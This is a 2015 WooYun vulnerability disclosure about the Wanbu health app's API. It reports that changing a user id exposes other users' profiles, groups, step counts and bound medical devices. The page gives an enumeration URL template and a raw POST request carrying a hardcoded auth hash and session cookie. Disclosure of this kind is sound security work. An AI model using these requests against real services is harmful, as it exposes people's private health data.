当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125108

漏洞标题:万步网手机app存在设计缺陷

相关厂商:万步网

漏洞作者: MelodyZX

提交时间:2015-07-07 14:08

修复时间:2015-08-21 14:10

公开时间:2015-08-21 14:10

漏洞类型:未授权访问/权限绕过

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-07-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

如题,可越权访问他人用户信息以及绑定设备

详细说明:

万步网以“日行万步,健康长驻”为理念,以“让一亿中国人享受日行万步的健康生活”为使命,是提供健走服务和健康管理服务的最权威、最科学、最专业的服务平台。其旗下的手机app万步存在设计不当缺陷,只对用户是否登录进行了验证,其他应用请求可以通过更改用户id的方式进行绕过,从而获取其他用户的私人信息。
验证一:
查看个人信息
http://www.wanbu.com.cn/NewWanbu/App/Api/index.php/Blog/getBlog/userid/[id]/page/0/

用户信息查询.png


遍历他人信息

遍历个人信息.png


验证二:
查看他人团体信息

遍历用户参加团体.png


朋友圈子.png


验证三:
我认为比较严重的是查看他人的健康数据以及绑定的健康设备(如 血压计、血糖计等)

POST /NEW_WAE_phone/AddressBookService HTTP/1.1
Host: www.wanbu.com.cn:8888
Proxy-Connection: close
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Content-Length: 256
Connection: close
Cookie: PHPSESSID=ppvg3blibc0pnklq3ms5ai46s3
User-Agent: 
ReqMessageHead=%7B%22authPassword%22%3A%2216d11a76e75d1c8b4710fe64083ca671%22%2C%22authName%22%3A%22wanbu%22%2C%22requestName%22%3A%22GetMyFriendList%22%7D&ReqMessageBody=%7B%22userid%22%3A1064%2C%22fgid%22%3A-1%2C%22endnum%22%3A100%2C%22startnum%22%3A0%7D


1.jpeg


步行数据.png


血压计.png


说说.png


漏洞证明:

同上

修复方案:

增加对用户id身份的合法性验证

版权声明:转载请注明来源 MelodyZX@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝